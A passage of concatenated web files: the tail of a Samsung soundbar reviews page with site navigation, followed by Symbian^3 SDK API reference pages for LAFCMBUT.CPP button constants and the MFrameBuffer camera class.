shape="rect" href="http://twitter.com/share">Tweet</a></li> <li> </li> <li> </li> <li> <a shape="rect" href="http://pinterest.com/pin/create/button/?url=http://www.samsung.com/us/video/home-audio/HW-J7501/ZA&amp;media=http://www.samsung.com/us/system/consumer/product/hw/j7/50/hwj7501za/HW-J7501_004_Front-Set_Silver_7.jpg"><img src="//assets.pinterest.com/images/PinExt.png" alt=""></a> </li> </ul> </li> </ul> <a shape="rect" href="/us/video/home-audio/HW-J7501/ZA">Back to Product Overview</a> <h1>Owner Reviews</h1> <img src="http://www.samsung.com/us/system/consumer/product/hw/j7/50/hwj7501za/HW-J7501_004_Front-Set_Silver_7.jpg" alt=""> <p>Samsung HW-J7501 Wireless Multiroom Curved Soundbar w/ Wireless Subwoofer (Silver)</p> HW-J7501/ZA <ul> <li>bvseo-2.0.1.5</li> <li>bvseo-true</li> <li>bvseo-j</li> <li>bvseo-CLOUD</li> <li>bvseo-22ms</li> <li>bvseo-REVIEWS</li> <li>bvseo-PRODUCT</li> <li>bvseo-getContent</li> <li>bvseo-msg: The resource to the URL or file is currently unavailable.;</li> </ul> <a shape="rect" href="#top">Back to Top</a> <a shape="rect" href="/us">Samsung.com</a> <h6>Shop Products </h6> <a shape="rect" href="/us/shop">Shop Products</a> <a shape="rect" href="/us/shop/accessories">Shop Accessories</a> <a shape="rect" href="https://shop.us.samsung.com/store?Action=DisplayPage&amp;Locale=en_US&amp;SiteID=samsung&amp;id=ThreePgCheckoutShoppingCartPage">Shopping Cart</a> <a shape="rect" href="http://shop.us.samsung.com/store/samsung/home/en_US/ThemeID.38225500">Shop Refurbished</a> <h6>Shop Samsung </h6> <ul> <li><a shape="rect" href="/us/shop/">Shop All Products</a></li> <li><a shape="rect" href="/us/shop/accessories">Shop All Accessories</a></li> <li><a shape="rect" href="/us/shop/special-offers">Special Offers Online</a></li> <li><a shape="rect" href="http://shop.us.samsung.com/store/samsung/home/en_US/ThemeID.38225500">Certified Refurbished Products</a></li> </ul> <h6>Cell Phones </h6> <ul> <li><a shape="rect" href="/us/mobile/cell-phones/all-products?filter=galaxy-s">Galaxy S Phones</a></li> <li><a shape="rect" href="/us/mobile/cell-phones/all-products?filter=galaxy-note">Galaxy Note Phones</a></li> <li><a shape="rect" href="/us/mobile/cell-phones/">Cell Phones</a></li> <li><a shape="rect" href="/us/mobile/cell-phones/all-products?filter=prepaid">Prepaid/No Contract</a></li> <li><a shape="rect" href="/us/mobile/at-t">AT&amp;T Cell Phones</a></li> <li><a shape="rect" href="/us/mobile/verizon-wireless">Verizon Wireless Cell Phones</a></li> <li><a shape="rect" href="/us/mobile/sprint">Sprint Cell Phones</a></li> <li><a shape="rect" href="/us/mobile/t-mobile">T-Mobile Cell Phones</a></li> <li><a shape="rect" href="/us/mobile/us-cellular">U.S. Cellular Cell Phones</a></li> <li><a shape="rect" href="/us/mobile/cell-phones/all-products?filter=more-carriers">More Carriers</a></li> <li><a shape="rect" href="http://shop.us.samsung.com/store/samsung/list/CategoryID.70010500/ThemeID.38225500">Certified Pre-Owned Phones</a></li> <li><a shape="rect" href="/us/mobile/cell-phones/all-products">See All Cell Phones</a></li> </ul> <h6>TVs </h6> <ul> <li><a shape="rect" href="/us/video/4k-suhd-tv">4K SUHD TVs</a></li> <li><a shape="rect" href="/us/video/uhd-tv">4K UHD TVs</a></li> <li><a shape="rect" href="/us/video/led-tv">LED TVs</a></li> <li><a shape="rect" href="/us/video/tvs">See All TVs</a></li> </ul> <h6>Tablets </h6> <ul> <li><a shape="rect" href="/us/mobile/galaxy-tab/">Galaxy Tabs</a></li> <li><a shape="rect" href="/us/mobile/galaxy-note/">Galaxy Notes</a></li> <li><a shape="rect" href="/us/mobile/wi-fi-tabs">Wi-Fi Tablets</a></li> <li><a shape="rect" href="/us/mobile/galaxy-tab/all-products?filter=4G-LTE">4G / LTE Tablets</a></li> <li><a shape="rect" href="http://shop.us.samsung.com/store/samsung/list/CategoryID.67795500/ThemeID.38225500">Refurbished Tablets</a></li> <li><a shape="rect" href="/us/mobile/galaxy-tab/all-products">See All Galaxy Tablets</a></li> </ul> <h6>Wearable Tech </h6> <ul> <li><a shape="rect" href="/us/mobile/wearable-tech/all-products?filter=smartwatches">Smartwatches</a></li> <li><a shape="rect" href="/us/mobile/wearable-tech/all-products?filter=virtual-reality-headsets">Virtual Reality Headsets</a></li> <li><a shape="rect" href="/us/mobile/wearable-tech">See All Gear</a></li> </ul> <h6>Home Theater &amp; Audio </h6> <ul> <li><a shape="rect" href="/us/video/multi-room">Wireless Multiroom Audio</a></li> <li><a shape="rect" href="/us/video/soundbars">Soundbars</a></li> <li><a shape="rect" href="/us/video/giga-sound-systems">Giga Sound Systems</a></li> <li><a shape="rect" href="/us/video/home-theater">Home Theater Systems</a></li> <li><a shape="rect" href="/us/video/blu-ray-players">Blu-ray Players</a></li> <li><a shape="rect" href="/us/video/dvd-players">DVD Players</a></li> <li><a shape="rect" href="/us/video/home-audio/">See All Home Audio Products</a></li> </ul> <h6>Digital Cameras &amp; Camcorders </h6> <ul> <li><a shape="rect" href="/us/photography/interchangeable-lens">Interchangeable Lens Cameras</a></li> <li><a shape="rect" href="/us/photography/galaxy-camera">Galaxy Cameras</a></li> <li><a shape="rect" href="/us/photography/compact-long-zoom">Long Zoom Cameras</a></li> <li><a shape="rect" href="/us/photography/point-and-shoot">Point and Shoot Cameras</a></li> <li><a shape="rect" href="/us/photography/digital-camcorders">HD Camcorders</a></li> <li><a shape="rect" href="http://shop.us.samsung.com/store/samsung/list/CategoryID.69535600/ThemeID.38225500">Refurbished Digital Cameras</a></li> <li><a shape="rect" href="/us/photography/digital-cameras/">See All Digital Cameras and Camcorders</a></li> </ul> <h6>Computing </h6> <ul> <li><a shape="rect" href="/us/computer/laptops">Laptops</a></li> <li><a shape="rect" href="/us/computer/chrome-os-devices">Chrome Devices</a></li> <li><a shape="rect" href="/us/computer/all-in-one-pcs">All-In-One PCs</a></li> <li><a shape="rect" href="/us/computer/monitors">Monitors</a></li> <li><a shape="rect" href="/us/computer/printers">Printers</a></li> <li><a shape="rect" href="/us/computer/pcs/all-products">See All PCs</a></li> </ul> <h6>Memory &amp; Storage </h6> <ul> <li><a shape="rect" href="/us/computer/ssd-pro">SSD PRO</a></li> <li><a shape="rect" href="/us/computer/ssd-evo">SSD EVO</a></li> <li><a shape="rect" href="/us/computer/portable-ssd/">Portable SSD</a></li> <li><a shape="rect" href="/us/computer/memory-storage-accessories/">Memory Cards &amp; USB Drives</a></li> </ul> <h6>Home Appliances </h6> <ul> <li><a shape="rect" href="/us/appliances/washers-dryers">Washers &amp; Dryers</a></li> <li><a shape="rect" href="/us/appliances/refrigerators">Refrigerators</a></li> <li><a shape="rect" href="/us/appliances/microwaves">Microwaves</a></li> <li><a shape="rect" href="/us/appliances/dishwashers">Dishwashers</a></li> <li><a shape="rect" href="/us/appliances/oven-ranges">Ranges</a></li> <li><a shape="rect" href="/us/appliances/vacuums">Vacuums</a></li> </ul> <h6>SMART HOME </h6> <ul> <li><a shape="rect" href="/us/smart-home/kit">Kits</a></li> <li><a shape="rect" href="/us/smart-home/hub">Hubs</a></li> <li><a shape="rect" href="/us/smart-home/sensor">Sensors</a></li> <li><a shape="rect" href="/us/smart-home/outlet">Outlets</a></li> <li><a shape="rect" href="/us/smart-home/smart-products/all-products">See All Smart Home Products</a></li> </ul> <h6>LED Lighting </h6> <ul> <li><a shape="rect" href="/us/appliances/led-lighting">LED Home Lighting</a></li> </ul> <h6>Security &amp; Monitoring </h6> <ul> <li><a shape="rect" href="/us/security-and-monitoring/ip-cameras">IP Cameras</a></li> <li><a shape="rect" href="/us/security-and-monitoring/security-systems/">Security Systems</a></li> <li><a shape="rect" href="/us/security-and-monitoring/baby-monitors">Baby Monitors</a></li> </ul> <h6>Help With Your Order </h6> <ul> <li><a shape="rect" href="http://shop.us.samsung.com/store/samsung/en_US/DisplayCustomerServiceOrderSearchPage/">Track Your Order</a></li> <li><a shape="rect" href="/us/support/customer-shopping-faqs/">Store FAQs</a></li> <li><a shape="rect" href="/us/support/customer-shopping-faqs/#questionID32">Return Your Order</a></li> <li><a shape="rect" href="/us/support/customer-shopping-faqs/#questionID9">Cancel Your Order</a></li> <li><a shape="rect" href="/us/support/">Product Support</a></li> </ul> <h6>Accessories </h6> <ul> <li><a shape="rect" href="/us/video/tvs-accessories">TV Accessories</a></li> <li><a shape="rect" href="/us/mobile/cell-phones-accessories">Cell Phone Accessories</a></li> <li><a shape="rect" href="/us/mobile/galaxy-tab-accessories">Tablet Accessories</a></li> <li><a shape="rect" href="/us/computer/printers-accessories">Printer Accessories</a></li> <li><a shape="rect" href="/us/computer/pcs-accessories">PC Accessories</a></li> <li><a shape="rect" href="/us/photography/digital-cameras-accessories">Digital Camera Accessories</a></li> <li><a shape="rect" href="/us/photography/camcorders-accessories">Digital Camcorder Accessories</a></li> <li><a shape="rect" href="/us/appliances/refrigerators-accessories">Refrigerator Accessories</a></li> <li><a shape="rect" href="/us/appliances/washers-dryers-accessories">Washer &amp; Dryer Accessories</a></li> <li><a shape="rect" href="/us/security-and-monitoring/security-systems-accessories/">Security System Accessories</a></li> <li><a shape="rect" href="/us/appliances/vacuums-accessories/">Vacuum Accessories</a></li> </ul> <h6>Discover </h6> <ul> <li><a shape="rect" href="/us/showcase/home-entertainment-televisions-and-audio/">Home Entertainment Has Never Been Better</a></li> <li><a shape="rect" href="/us/showcase/all-in-one-pcs-tablet-and-laptop-computers/">A New Era of Computing</a></li> <li><a shape="rect" href="/us/showcase/digital-cameras-and-lenses/">Share Life as it Happens</a></li> <li><a shape="rect" href="/us/showcase/samsung-chef-collection/">Indulge Your Inner Gourmet</a></li> <li><a shape="rect" href="http://techlife.samsung.com/">Tech Life: Ideas &amp; Inspiration</a></li> <li><a shape="rect" href="/us/showcase/environmental-responsibility-through-eco-innovations/">Building a Smarter Future</a></li> </ul> <h6>Apps &amp; Entertainment </h6> <ul> <li><a shape="rect" href="/us/apps/">Apps For Every Screen</a></li> <li><a shape="rect" href="/us/showcase/milk/">Samsung Milk Music</a></li> <li><a shape="rect" href="/us/samsung-pay/">Samsung Pay</a></li> <li><a shape="rect" href="/us/samsung-plus/">Samsung+</a></li> <li><a shape="rect" href="/us/smart-switch/">Smart Switch</a></li> </ul> <h6>Owners &amp; Support </h6> <ul> <li><a shape="rect" href="/us/support/">Get Support</a></li> <li><a shape="rect" href="/us/support/account/">Samsung Account</a></li> <li><a shape="rect" href="/us/support/get-started/">Set Up Your New Device</a></li> <li><a shape="rect" href="/us/experience/skills-workshop/">Samsung Skills Workshop</a></li> <li><a shape="rect" href="/us/support/register/product">Register Your Device</a></li> <li><a shape="rect" href="/us/support/downloads">Manuals &amp; Downloads</a></li> <li><a shape="rect" href="/us/support/contact-customer-services/">Help With Your Order</a></li> <li><a shape="rect" href="/us/support/contact">Contact Support</a></li> </ul> <h6>About Us </h6> <ul> <li><a shape="rect" href="/us/aboutsamsung/">About Samsung</a></li> <li><a shape="rect" href="/us/aboutsamsung/careers/welcome/Careers_Welcome.html">Careers</a></li> <li><a shape="rect" href="/us/aboutsamsung/sustainability/sustainablemanagement/">Sustainability</a></li> <li><a shape="rect" href="/us/news/">News</a></li> <li><a shape="rect" href="/us/samsunghopeforchildren/">Hope for Children</a></li> <li><a shape="rect" href="/us/aboutsamsung/ir/newsMain.do">Investor Relations</a></li> <li><a shape="rect" href="/us/aboutsamsung/citizenship/usactivities/environmentalinitiatives/recyclingdirect/">Product Recycling</a></li> </ul> Follow Us <ul> <li><a shape="rect" href="https://www.facebook.com/SamsungUSA">Facebook</a></li> <li><a shape="rect" href="https://twitter.com/samsungtweets">Twitter</a></li> <li><a shape="rect" href="https://plus.google.com/+SamsungUSA/posts">Google+</a></li> <li><a shape="rect" href="http://instagram.com/samsungusa#">Instagram</a></li> <li><a shape="rect" href="http://www.youtube.com/user/samsungusatube">You Tube</a></li> <li><a shape="rect" href="http://www.samsung.com/us/sign-up.us">Email</a></li> </ul> <ul> <li><a shape="rect" href="/us/business/">For Business</a></li> <li><a shape="rect" href="/us/common/privacy.html">Privacy</a></li> <li><a shape="rect" href="/us/common/legal.html">Legal</a></li> <li><a shape="rect" href="/us/common/sitemap.html">Sitemap</a></li> <li><a shape="rect" href="/us/aboutsamsung/rss/rssFeedList.do">RSS</a></li> <li><a shape="rect" href="/us/common/visitcountrysite.html">USA/English</a></li> </ul> <p> Copyright © 1995-2015 SAMSUNG All Rights reserved. </p> Loading <h1>Item Added</h1> <img src="" alt=""> <h1>Shopping Cart</h1> SUBTOTAL  <a shape="rect">VIEW SHOPPING CART</a> CHECKOUT <h1>Item Added to Cart</h1> VIEW CART CHECKOUT </body></html>
sdk/GUID-68260F6E-1B71-3E13-8F45-254BC768571D.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Copyright 2010" /> <meta name="DC.rights.owner" content="(C) Copyright 2010" /> <meta name="DC.Type" content="cxxFile" /> <meta name="DC.Title" content="LAFCMBUT.CPP" /> <meta name="DC.Format" content="XHTML" /> <meta name="DC.Identifier" content="GUID-68260F6E-1B71-3E13-8F45-254BC768571D" /> <title> LAFCMBUT.CPP </title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api" /> <link rel="stylesheet" type="text/css" href="cxxref.css" /> </head> <body class="cxxref" id="GUID-68260F6E-1B71-3E13-8F45-254BC768571D"> <a name="GUID-68260F6E-1B71-3E13-8F45-254BC768571D"> <!-- --> </a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Application Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"> <a href="index.html" title="Symbian^3 Application Developer Library"> Symbian^3 Application Developer Library </a> &gt; </div> <h1 class="topictitle1"> LAFCMBUT.CPP File Reference </h1> <div class="nested1" id="GUID-0D4A406D-B7B2-35A9-9AC1-5B2324D2C7A7"> <a name="GUID-0D4A406D-B7B2-35A9-9AC1-5B2324D2C7A7"> <!-- --> </a> <h2 class="topictitle2"> const TInt KPressedDepth </h2> <table class="signature"> <tr> <td> const <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> KPressedDepth </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-38216C11-C7C0-30DB-819A-6D254A43D850"> <a name="GUID-38216C11-C7C0-30DB-819A-6D254A43D850"> <!-- --> </a> <h2 class="topictitle2"> const TInt KSetDepth </h2> <table class="signature"> <tr> <td> const <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> KSetDepth </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-7BB23344-798F-31F6-9D72-7DA1655C8716"> <a name="GUID-7BB23344-798F-31F6-9D72-7DA1655C8716"> <!-- --> </a> <h2 class="topictitle2"> const TInt KImageMargin </h2> <table class="signature"> <tr> <td> const <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> KImageMargin </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-ACAB0677-3EF9-35EC-B8CD-06E164584A92"> <a name="GUID-ACAB0677-3EF9-35EC-B8CD-06E164584A92"> <!-- --> </a> <h2 class="topictitle2"> const TInt KLabelMargin </h2> <table class="signature"> <tr> <td> const <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> KLabelMargin </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-A27043E7-F389-3E11-8102-B4745AD6E302"> <a name="GUID-A27043E7-F389-3E11-8102-B4745AD6E302"> <!-- --> </a> <h2 class="topictitle2"> const TInt KIntraComponentMargin </h2> <table class="signature"> <tr> <td> const <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> KIntraComponentMargin </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-5FE04D80-11A0-3DFB-BF24-0A36FB9956DB"> <a name="GUID-5FE04D80-11A0-3DFB-BF24-0A36FB9956DB"> <!-- --> </a> <h2 class="topictitle2"> const TInt KCommandButtonBaseHorizontalMargins </h2> <table class="signature"> <tr> <td> const <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> KCommandButtonBaseHorizontalMargins </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-A722FE59-27E1-35FC-A949-BDF9E1A851DC"> <a name="GUID-A722FE59-27E1-35FC-A949-BDF9E1A851DC"> <!-- --> </a> <h2 class="topictitle2"> const TInt KCommandButtonBaseVerticalMargins </h2> <table class="signature"> <tr> <td> const <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> KCommandButtonBaseVerticalMargins </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-DE88549C-CD7E-3EB7-AC3E-45EF79C6D2B6"> <a name="GUID-DE88549C-CD7E-3EB7-AC3E-45EF79C6D2B6"> <!-- --> </a> <h2 class="topictitle2"> const TInt KBitmapButtonHorizontalMargins </h2> <table class="signature"> <tr> <td> const <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> KBitmapButtonHorizontalMargins </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-64AECE95-88A3-3E0E-A170-D9B0581E0368"> <a name="GUID-64AECE95-88A3-3E0E-A170-D9B0581E0368"> <!-- --> </a> <h2 class="topictitle2"> const TInt KBitmapButtonVerticalMargins </h2> <table class="signature"> <tr> <td> const <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> KBitmapButtonVerticalMargins </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-FA2A07EF-8AE7-32F5-8461-ADAB20CB367D"> <a name="GUID-FA2A07EF-8AE7-32F5-8461-ADAB20CB367D"> <!-- --> </a> <h2 class="topictitle2"> const TInt KTextButtonHorizontalMargins </h2> <table class="signature"> <tr> <td> const <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> KTextButtonHorizontalMargins </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-F92561FE-D7CE-3644-855D-02907EAE3AF2"> <a name="GUID-F92561FE-D7CE-3644-855D-02907EAE3AF2"> <!-- --> </a> <h2 class="topictitle2"> const TInt KTextButtonVerticalMargins </h2> <table class="signature"> <tr> <td> const <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> KTextButtonVerticalMargins </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-487A75F1-D83D-33A3-A050-1C48207CECC3"> <a name="GUID-487A75F1-D83D-33A3-A050-1C48207CECC3"> <!-- --> </a> <h2 class="topictitle2"> const TInt KBorderClear </h2> <table class="signature"> <tr> <td> const <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> KBorderClear </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-5215D5D0-DE21-3162-902E-B1E727DE2936"> <a name="GUID-5215D5D0-DE21-3162-902E-B1E727DE2936"> <!-- --> </a> <h2 class="topictitle2"> const TInt KBorderClearPressed </h2> <table class="signature"> <tr> <td> const <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> KBorderClearPressed </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-ED91328C-10B3-3575-A27C-7DCDC9EE33C7"> <a name="GUID-ED91328C-10B3-3575-A27C-7DCDC9EE33C7"> <!-- --> </a> <h2 class="topictitle2"> const TInt KBorderSet </h2> <table class="signature"> <tr> <td> const <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> KBorderSet </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-27710165-3140-34C4-8D6F-9EF67145F555"> <a name="GUID-27710165-3140-34C4-8D6F-9EF67145F555"> <!-- --> </a> <h2 class="topictitle2"> const TInt KBorderSetPressed </h2> <table class="signature"> <tr> <td> const <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> KBorderSetPressed </td> </tr> </table> <div class="section"> </div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
pdk/GUID-47A93851-F7D9-3261-823A-CFB98357B51B.html
warlordh/fork_Symbian
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="copyright" content="(C) Copyright 2010"/> <meta name="DC.rights.owner" content="(C) Copyright 2010"/> <meta name="DC.Type" content="cxxClass"/> <meta name="DC.Title" content="MFrameBuffer"/> <meta name="DC.Format" content="XHTML"/> <meta name="DC.Identifier" content="GUID-47A93851-F7D9-3261-823A-CFB98357B51B"/> <title>MFrameBuffer</title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api"/><link rel="stylesheet" type="text/css" href="cxxref.css"/></head> <body class="cxxref" id="GUID-47A93851-F7D9-3261-823A-CFB98357B51B"><a name="GUID-47A93851-F7D9-3261-823A-CFB98357B51B"><!-- --></a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()">Collapse all</a> <a id="index" href="index.html">Symbian^3 Product Developer Library</a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1">&#160;</div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2437088 id2437096 id2578593 id2865498 id2865502 id2865507 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"><a href="index.html" title="Symbian^3 Product Developer Library">Symbian^3 Product Developer Library</a> &gt;</div> <h1 class="topictitle1">MFrameBuffer Class Reference</h1> <table class="signature"><tr><td>class MFrameBuffer</td></tr></table><div class="section"><div> <p>Buffer class for passing video frames between camera and client.</p> <p>May contain multiple frames.</p> </div></div> <div class="section member-index"><table border="0" class="member-index"><thead><tr><th colspan="2">Public Member Functions</th></tr></thead><tbody><tr><td align="right" class="code"> <a href="GUID-FB97E0A3-352A-316F-97C6-69E4741A8120.html">TDesC8</a> *</td><td><a href="#GUID-FE2325D7-6EEF-35F1-B689-0D5FB6D5CB26">DataL</a>(<a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TInt</a>)</td></tr><tr class="bg"><td align="right" class="code">CFbsBitmap *</td><td><a href="#GUID-2DD47071-A182-3D02-A107-2CC634B6A14D">FrameL</a>(<a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TInt</a>)</td></tr><tr><td align="right" class="code">void</td><td><a href="#GUID-6555D7F3-48A2-32CA-ADDF-647ED4DE2F16">Release</a>()</td></tr></tbody></table><table border="0" class="member-index"><thead><tr><th colspan="2">Public Attributes</th></tr></thead><tbody><tr><td align="right" valign="top"> <a href="GUID-B7D6F874-1ABD-3AC6-9329-19DC54C12F18.html">TTimeIntervalMicroSeconds</a> </td><td><a href="#GUID-5DD4053F-69A6-3B52-899B-892473CAB100">iElapsedTime</a></td></tr><tr class="bg"><td align="right" valign="top"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TInt</a> </td><td><a href="#GUID-40C0F511-25BE-3415-A400-6A2BB0B6AD07">iIndexOfFirstFrameInBuffer</a></td></tr></tbody></table></div><h1 class="pageHeading topictitle1">Member Functions Documentation</h1><div class="nested1" id="GUID-FE2325D7-6EEF-35F1-B689-0D5FB6D5CB26"><a name="GUID-FE2325D7-6EEF-35F1-B689-0D5FB6D5CB26"><!-- --></a> <h2 class="topictitle2">DataL(TInt)</h2> <table class="signature"><tr><td> <a href="GUID-FB97E0A3-352A-316F-97C6-69E4741A8120.html">TDesC8</a> *</td><td>DataL</td><td>(</td><td><a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TInt</a></td><td>aIndex</td><td>)</td><td>[pure virtual]</td></tr></table><div class="section"><div> <p>Gets a non-bitmap frame in the buffer.</p> <div class="p"> <dl class="user"> <dt class="dlterm"> <strong>leave</strong> </dt> <dd>KErrArgument if aIndex is out of range </dd> </dl> <dl class="user"> <dt class="dlterm"> <strong>leave</strong> </dt> <dd>KErrNotSupported if the frame format is bitmap. </dd> </dl> </div> </div></div> <div class="section parameters"><h3 class="sectiontitle">Parameters</h3><table border="0" class="parameters"><tr><td class="parameter"><a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TInt</a> aIndex</td><td>The index of the required, non-bitmap, frame. </td></tr></table></div> </div> <div class="nested1" id="GUID-2DD47071-A182-3D02-A107-2CC634B6A14D"><a name="GUID-2DD47071-A182-3D02-A107-2CC634B6A14D"><!-- --></a> <h2 class="topictitle2">FrameL(TInt)</h2> <table class="signature"><tr><td>CFbsBitmap *</td><td>FrameL</td><td>(</td><td><a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TInt</a></td><td>aIndex</td><td>)</td><td>[pure virtual]</td></tr></table><div class="section"><div> <p>Gets a bitmap frame in the buffer.</p> <div class="p"> <dl class="user"> <dt class="dlterm"> <strong>leave</strong> </dt> <dd>KErrArgument if aIndex is out of range and </dd> </dl> <dl class="user"> <dt class="dlterm"> <strong>leave</strong> </dt> <dd>KErrNotSupported if the frame format is not a bitmap. </dd> </dl> </div> </div></div> <div class="section parameters"><h3 class="sectiontitle">Parameters</h3><table border="0" class="parameters"><tr><td class="parameter"><a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TInt</a> aIndex</td><td>The index of the required, bitmap format, frame. </td></tr></table></div> </div> <div class="nested1" id="GUID-6555D7F3-48A2-32CA-ADDF-647ED4DE2F16"><a name="GUID-6555D7F3-48A2-32CA-ADDF-647ED4DE2F16"><!-- --></a> <h2 class="topictitle2">Release()</h2> <table class="signature"><tr><td>void</td><td>Release</td><td>(</td><td>)</td><td>[pure virtual]</td></tr></table><div class="section"><div> <p>Releases the buffer for re-use by the camera once the client has processed the frame data.</p> <p>Signals to <a href="GUID-021C509B-C821-3401-B2F4-DE7F52BB16D4.html#GUID-021C509B-C821-3401-B2F4-DE7F52BB16D4">CCamera</a> that the buffer data has been used and that the buffer is free for re-use. </p> </div></div> </div> <h1 class="pageHeading topictitle1">Member Data Documentation</h1><div class="nested1" id="GUID-5DD4053F-69A6-3B52-899B-892473CAB100"><a name="GUID-5DD4053F-69A6-3B52-899B-892473CAB100"><!-- --></a> <h2 class="topictitle2"> TTimeIntervalMicroSeconds iElapsedTime</h2> <table class="signature"><tr><td> <a href="GUID-B7D6F874-1ABD-3AC6-9329-19DC54C12F18.html">TTimeIntervalMicroSeconds</a> </td><td>iElapsedTime</td></tr></table><div class="section"><div> <p> <a href="GUID-B81A50BE-2045-3040-A5DD-D5DE03B52FCC.html#GUID-B81A50BE-2045-3040-A5DD-D5DE03B52FCC">Time</a> elapsed from when <a href="GUID-021C509B-C821-3401-B2F4-DE7F52BB16D4.html#GUID-8743EF65-BE30-3B98-8B35-8BE1A64E93F3">CCamera::StartVideoCapture()</a> was called until the first frame in the buffer was captured. </p> </div></div> </div> <div class="nested1" id="GUID-40C0F511-25BE-3415-A400-6A2BB0B6AD07"><a name="GUID-40C0F511-25BE-3415-A400-6A2BB0B6AD07"><!-- --></a> <h2 class="topictitle2"> TInt iIndexOfFirstFrameInBuffer</h2> <table class="signature"><tr><td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html">TInt</a> </td><td>iIndexOfFirstFrameInBuffer</td></tr></table><div class="section"><div> <p>Sequential frame number of the first frame in the buffer, counting from when <a href="GUID-021C509B-C821-3401-B2F4-DE7F52BB16D4.html#GUID-8743EF65-BE30-3B98-8B35-8BE1A64E93F3">CCamera::StartVideoCapture()</a> was called and including frames dropped due to lack of buffers. </p> 